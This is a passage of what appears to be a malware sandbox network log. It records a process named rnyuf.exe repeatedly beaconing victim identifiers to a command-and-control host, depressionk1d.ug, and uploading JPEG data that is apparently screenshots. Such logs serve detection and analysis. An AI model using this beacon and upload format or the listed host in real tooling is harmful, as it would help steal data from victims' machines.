                          Data Ascii: +kZxVM0]ls+~#s\.a@EWliO/v_]U?Y'Wwe)IdePLmZ5EU?AK/O>2eT6u<KSjV:wwje;j@S%-4&wN5X%WxP2
                          Nov 12, 2021 22:23:37.758439064 CET5449OUTData Raw: 4d ef 45 30 1d 9a 5c d3 69 69 a1 0e 14 bd e9 a2 97 34 ee 21 d9 a2 9b 9a 33 4c 56 1d 9a 5c d3 33 4b 4c 56 1e 29 c2 9a 3b 52 8a 68 4c 5a 5a 4a 29 88 5a 29 28 34 08 5a 5a 4a 29 80 b9 a5 a4 a2 80 14 1a 70 a6 52 8a 68 43 fb 52 d3 41 a5 aa 24 78 34 b4
                          Data Ascii: ME0\ii4!3LV\3KLV);RhLZZJ)Z)(4ZZJ)pRhCRA$x4iiE474fNPH(N5Dp4id8U!N$qXp4gLZB+hEQf4s).MOZhjvsUqXwJ\hyM2lIK`4<Pj=n+
                          Nov 12, 2021 22:23:37.806129932 CET5469INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:37 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          81192.168.2.449865178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:37.748758078 CET5401OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:37.775949955 CET5454INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:37 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          82192.168.2.449866178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:37.916663885 CET5470OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:37.942341089 CET5470INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:37 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          83192.168.2.449867178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:38.084495068 CET5471OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:38.111748934 CET5471INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          84192.168.2.449868178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:38.232527971 CET5472OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:38.232707977 CET5472OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:38.232938051 CET5482OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:38.233027935 CET5485OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:38.256956100 CET5491OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:38.257009029 CET5511OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:38.282519102 CET5517OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:38.282571077 CET5522OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:23:38.282588005 CET5525OUTData Raw: 24 f0 cc b2 e9 b1 5d c5 a9 69 f2 49 34 13 5c c1 6a 0c a2 59 a3 89 98 3b 2e 50 2f f0 31 c1 60 70 3a 76 aa e9 a1 dd 3e a7 05 80 96 df cd 9a c8 5f 29 dc 76 88 fc 93 36 0f 1d 76 8f a6 7b f7 ab 17 1e 23 58 b4 0d 2a d2 c2 da cc ea 31 d9 5c 41 35 d9 8e
                          Data Ascii: $]iI4\jY;.P/1`p:v>_)v6v{#X*1\A5A%iTuH@#4?AiDi@`v0wv{c5VIw4[?wWu<j)d2x*pH#SxjKIYuO,Bw@dHjC}&_-r[+YE+9
                          Nov 12, 2021 22:23:38.282603979 CET5530OUTData Raw: d1 0a 29 c2 80 28 02 a0 d1 21 45 2e 38 a0 0a 5c 71 48 a1 cb 52 2d 30 0c 53 85 4b 2d 12 0a 95 7a 54 42 a4 02 b3 66 d1 24 a5 c7 14 d1 4e 15 0c b1 40 af 29 f8 a7 f7 ad 3d dd cf f2 af 57 1d 6b ca 3e 2a 63 cc b2 fa bf f4 ad 68 7c 44 55 e8 78 ae 68 cf
                          Data Ascii: )(!E.8\qHR-0SK-zTBf$N@)=Wk>*ch|DUxh+M@<Gy%jng#3u\ ua[Of.<^5dUWVGQS[vPo+43=4ohdy6||MbzC\CW?9+
                          Nov 12, 2021 22:23:38.282649040 CET5533OUTData Raw: 29 4c fc d9 c6 49 c9 eb f2 8a f7 b9 bf e1 22 f3 e4 f2 3f b2 fc 9d c7 66 ff 00 33 76 dc f1 9c 77 c5 79 3d cc ff 00 07 a7 27 cb d6 6e ed b3 ff 00 3c a2 9c e3 fe fa 8c d7 45 37 8d fe 16 cf 3c 93 4b a8 ee 92 46 2e c7 c8 ba 19 24 e4 ff 00 0d 71 62 64
                          Data Ascii: )LI"?f3vwy='n<E7<KF.$qbdt}GD)>yn7357_Mp|UC^;%yR&||*UiE5K`9^~i)4.u%H8 bp
                          Nov 12, 2021 22:23:38.333080053 CET5582INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          85192.168.2.449869178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:38.248425961 CET5485OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:38.275011063 CET5511INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          86192.168.2.449870178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:38.417346001 CET5583OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:38.446469069 CET5584INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          87192.168.2.449871178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:38.588937044 CET5584OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:38.615972996 CET5585INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          88192.168.2.449872178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:38.742609024 CET5585OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:38.742760897 CET5586OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:38.742964029 CET5596OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:38.743061066 CET5598OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:38.768506050 CET5619OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:38.768564939 CET5624OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:38.791318893 CET5630OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:38.791352987 CET5636OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:23:38.791399002 CET5638OUTData Raw: 24 f0 cc b2 e9 b1 5d c5 a9 69 f2 49 34 13 5c c1 6a 0c a2 59 a3 89 98 3b 2e 50 2f f0 31 c1 60 70 3a 76 aa e9 a1 dd 3e a7 05 80 96 df cd 9a c8 5f 29 dc 76 88 fc 93 36 0f 1d 76 8f a6 7b f7 ab 17 1e 23 58 b4 0d 2a d2 c2 da cc ea 31 d9 5c 41 35 d9 8e
                          Data Ascii: $]iI4\jY;.P/1`p:v>_)v6v{#X*1\A5A%iTuH@#4?AiDi@`v0wv{c5VIw4[?wWu<j)d2x*pH#SxjKIYuO,Bw@dHjC}&_-r[+YE+9
                          Nov 12, 2021 22:23:38.791476965 CET5641OUTData Raw: d1 0a 29 c2 80 28 02 a0 d1 21 45 2e 38 a0 0a 5c 71 48 a1 cb 52 2d 30 0c 53 85 4b 2d 12 0a 95 7a 54 42 a4 02 b3 66 d1 24 a5 c7 14 d1 4e 15 0c b1 40 af 29 f8 a7 f7 ad 3d dd cf f2 af 57 1d 6b ca 3e 2a 63 cc b2 fa bf f4 ad 68 7c 44 55 e8 78 ae 68 cf
                          Data Ascii: )(!E.8\qHR-0SK-zTBf$N@)=Wk>*ch|DUxh+M@<Gy%jng#3u\ ua[Of.<^5dUWVGQS[vPo+43=4ohdy6||MbzC\CW?9+
                          Nov 12, 2021 22:23:38.791553974 CET5646OUTData Raw: 37 92 6e 14 6d 93 19 da ca c1 86 47 a6 54 57 95 86 9a 85 68 4a 5b 26 bf 33 aa ac 5b 83 4b b1 f2 86 68 07 34 bb 29 42 1a fb ab 1e 06 82 52 d1 b4 d2 ec 34 f5 10 94 52 ec 34 bb 0d 3b 05 cf b4 09 ac a7 3f e9 32 ff 00 be 7f 9d 69 93 59 2e 7f d2 65 ff
                          Data Ascii: 7nmGTWhJ[&3[Kh4)BR4R4;?2iY.e|:JC`1O:_UG_8P<otRc"z20S{Wzy(h/q3Gk*e(M8BM\MKqkGpEboAm=x:4wk,
                          Nov 12, 2021 22:23:38.843789101 CET5696INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:38.891987085 CET5696OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:38.920583963 CET5697INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          89192.168.2.449873178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:38.759351015 CET5599OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:38.785475016 CET5625INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:38 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          9192.168.2.449790178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:11.904764891 CET1578OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:11.904947042 CET1579OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:11.905127048 CET1589OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:11.905235052 CET1591OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
